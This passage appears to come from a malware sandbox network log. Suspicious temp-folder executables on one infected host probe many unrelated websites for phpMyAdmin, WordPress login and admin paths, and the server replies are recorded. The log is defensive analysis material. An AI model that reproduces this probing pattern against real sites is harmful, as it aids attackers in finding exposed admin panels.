https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: d2ed271555a5d8c116294615222ac5ad
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:13 UTC  664                IN         Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


Session ID  Source IP    Source Port  Destination IP  Destination Port
235         192.168.2.6  49734        195.85.23.95    443
Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  339                OUT        GET /PhpMyAdmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=sPlAOmI.SbF_K0Yty9SLocQQuQdWvCM6UlqNiDKSrHQ-1707131771-1-AZvJvOdJHH+VSfQDYfBdRd41atdb1A/vcpLWtYycbqzt0xc3vhWXbndMTivUeKm3/bUkXK+WsVKIU5M1CWciaxI=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC  858                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: bonga20120608=109d3c67844e2626e7238fbaf3bc9916; path=/; domain=.bongacams.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                set-cookie: ts_type2=1; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: fv=Zmp3ZGZkAmN3ZD==; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: uh=MSEJZ293o3OgEmMlZSScFzESBJALBD==; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                location: /phpmyadmin
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded7546-web23
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6f5d91457b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:13 UTC  88                 IN         Data Ascii: 52<html><head><meta http-equiv="refresh" content="0;url=/phpmyadmin"/></head></html>
2024-02-05 11:16:13 UTC  5                  IN         Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
236         192.168.2.6  50036        13.249.120.4    443               524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  165                OUT        GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC  460                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.tiktok.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: FunctionGeneratedResponse from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 d91dc6a660ec6bf6fc34949f578bd058.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: WRn3_SkLrhjAA6tACmgoZFeospB0nUxxRcjWH0t8Q8Mql85OSVc-iw==
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload


Session ID  Source IP    Source Port  Destination IP  Destination Port
237         192.168.2.6  49690        3.141.96.53     443
Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  174                OUT        GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC113INHTTP/1.1 439 <none>
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
238 | 192.168.2.6 | 49693 | 104.26.14.180 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 186 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: aeaaamorim.inovarmais.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 552 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OnqRHQ2azDFaFwyxwOdel74%2FugULTjZXjHMOtC6jKS2%2BLBjoQfNIPvC98bn6Zr30Scemkg%2BAzM0oyGl%2BSFz8eF%2FiDrt3kQdUaif93N5IUhKGFzrPF1wDylRfKBqS5pCrY3ENYAYciMHUtXE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd6fccbdb121-ATL
2024-02-05 11:16:13 UTC | 817 | IN | Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
2024-02-05 11:16:13 UTC | 435 | IN | Data Ascii: background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not foun
2024-02-05 11:16:13 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
239 | 192.168.2.6 | 49713 | 31.216.144.5 | 443 | 7100 | C:\Users\user\AppData\Local\Temp\FE8B.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 157 | OUT | GET / HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 969 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Length: 2689
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Set-Cookie: geoip=RO
Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
Connection: Close
2024-02-05 11:16:13 UTC | 2689 | IN | Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
240 | 192.168.2.6 | 49724 | 23.4.32.216 | 443 | 2156 | C:\Windows\System32\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 180 | OUT | GET /wp-login.php HTTP/1.1
Host: steamcommunity.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 202 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Location: https://steamcommunity.com
Content-Length: 0
Date: Mon, 05 Feb 2024 11:16:13 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
241 | 192.168.2.6 | 49739 | 177.74.1.157 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 179 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: sistemas.pa.gov.br
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 164 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:13 GMT
Server: Apache
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
2024-02-05 11:16:13 UTC | 196 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
242 | 192.168.2.6 | 49723 | 142.250.105.84 | 443 | 2156 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 842 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:13 UTC | 1252 | IN | Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sDpu6fHbYiJOMBKioU8nDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:13 UTC | 397 | IN | Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:13 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
243 | 192.168.2.6 | 49728 | 172.66.40.88 | 443 | 4632 | C:\Users\user\AppData\Local\Temp\InstallSetup4.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 176 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: warriorplus.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:14 UTC | 1366 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3
expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: warriorplus=giequ27s2rlgl173cf4omrgtg5; expires=Wed, 06-Mar-2024 11:16:13 GMT; Max-Age=2592000; path=/
set-cookie: rqtok=cc06cf2a2b3b701ce398; expires=Tue, 06-Feb-2024 11:16:13 GMT; Max-Age=86400; path=/
set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/
set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:13 GMT; Max-Age=31536000; path=/
2024-02-05 11:16:14 UTC | 517 | IN | Data Ascii: set-cookie: na_new=1; expires=Tue, 06-Feb-2024 11:16:14 GMT; Max-Age=86400; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CK8GpgGblvtmXqLlv39MQBnfPAc7OuhUYbCjQgM2wQDBoMMpCYgy9KZ9UjyYcaAtXcm
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC1369INData Raw: 33 34 61 36 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 61 72 72 69 6f 72 50 6c 75 73 20 7c 20 57 61 72 72 69 6f 72 50 6c 75 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 72 72 69 6f 72 50 6c 75 73 20 3a 20 59 6f 75 72 20 50 72 6f 66 69 74 20 69 73 20 4f 75 72 20 42 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 34a6<!DOCTYPE html><html lang="en"><head><title>WarriorPlus | WarriorPlus</title><meta property="og:type" content="website"><meta property="og:title" content="WarriorPlus"><meta property="og:site_name" content="WarriorPlus : Your Profit is Our Bu


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
244         192.168.2.6  49765        172.66.43.117   443               4328  C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  168  OUT  GET /admin/ HTTP/1.1
Host: login.adf.ly
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC  763  IN  HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
www-authenticate: Basic realm="EnterPassword"
x-frame-options: SAMEORIGIN
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oX1Wysvm258tZWuiG2lXX4QoiNwYfmvfoY7RCwZAntGRcVj9pC8Ct4G4qdMZ3u3doyd%2FxcZocj5xmiuEZ%2B5%2FKSvK%2FzPJZ2A%2BPSr1aUesYdB0KTGjBjPWOjjF15f4XdE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd710da9b0ee-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:16:13 UTC  606  IN  Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
2024-02-05 11:16:13 UTC  100  IN  Data Ascii: rbidden</h2><p>Access to this resource on the server is denied!</p></div></div></body></html>
2024-02-05 11:16:13 UTC  5  IN  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
245 | 192.168.2.6 | 50054 | 185.120.71.26 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 178 | OUT | GET /wp-login.php HTTP/1.1
Host: www.analvids.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:14 UTC | 340 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=h22ommkr94dg2i4eebha6sl5bj; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
246 | 192.168.2.6 | 50031 | 178.16.128.181 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 173 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: mobilsam.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 762 | IN | HTTP/1.1 404 Not Found
Connection: close
x-powered-by: PHP/8.1.26
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 106_HTTP.404,106_404,106_URL.0045a36e9aa35622a617ea518918c32d,106_
x-litespeed-cache: miss
transfer-encoding: chunked
date: Mon, 05 Feb 2024 11:16:13 GMT
server: LiteSpeed
platform: hostinger
content-security-policy: upgrade-insecure-requests
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:14 UTC16384INData Raw: 5c 2d 73 7c 64 65 76 69 7c 64 69 63 61 7c 64 6d 6f 62 7c 64 6f 28 63 7c 70 29 6f 7c 64 73 28 31 32 7c 5c 2d 64 29 7c 65 6c 28 34 39 7c 61 69 29 7c 65 6d 28 6c 32 7c 75 6c 29 7c 65 72 28 69 63 7c 6b 30 29 7c 65 73 6c 38 7c 65 7a 28 5b 34 2d 37 5d 30 7c 6f 73 7c 77 61 7c 7a 65 29 7c 66 65 74 63 7c 66 6c 79 28 5c 2d 7c 5f 29 7c 67 31 20 75 7c 67 35 36 30 7c 67 65 6e 65 7c 67 66 5c 2d 35 7c 67 5c 2d 6d 6f 7c 67 6f 28 5c 2e 77 7c 6f 64 29 7c 67 72 28 61 64 7c 75 6e 29 7c 68 61 69 65 7c 68 63 69 74 7c 68 64 5c 2d 28 6d 7c 70 7c 74 29 7c 68 65 69 5c 2d 7c 68 69 28 70 74 7c 74 61 29 7c 68 70 28 20 69 7c 69 70 29 7c 68 73 5c 2d 63 7c 68 74 28 63 28 5c 2d 7c 20 7c 5f 7c 61 7c 67 7c 70 7c 73 7c 74 29 7c 74 70 29 7c 68 75 28 61 77 7c 74 63 29 7c 69 5c 2d 28 32 30 7c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
247 | 192.168.2.6 | 50055 | 3.161.150.69 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 178 | OUT | GET /admin.php HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 2006 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
server: envoy
date: Mon, 05 Feb 2024 11:16:13 GMT
content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=3c384f3e96cf001b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilM28zDN-eA-X1rEpLDxs1ICqaeiDPezNiI
content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=3c384f3e96cf001b&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgTofTsWVfilM28zDN-eA-X1rEpLDxs1ICqaeiDPezNiI; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-8CkX0tTN0wISZS0' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
x-xss-protection: 1; mode=block
strict-transport-security: max-age=86400; includeSubDomains
X-Cache: Error from cloudfront
Via: 1.1 7e1e27db89c10c5d284149b3df2ae272.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: WaBxQvY1IzXgA6EPIUuZY34uXiY6D_8EhwMer05u_ZrTDrz8AQf6bQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
248 | 192.168.2.6 | 50215 | 138.197.59.199 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:13 UTC | 242 | OUT | GET /admin/login HTTP/1.1
Host: api.cmrsanmartin.ziz.cl
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: JSESSIONID=m6ZW6nO9UoY9k-niVSF6oRF4.cmrsanmartin
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC | 531 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Powered-By: JSP/2.2
X-XSS-Protection: 1; mode=block
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Robots-Tag: noindex,noarchive
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Content-Type: text/html;charset=UTF-8
Content-Language: es-CL
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
249         192.168.2.6  50072        142.250.105.84  443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:13 UTC  173                OUT        GET /pma/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:13 UTC  842                IN         HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
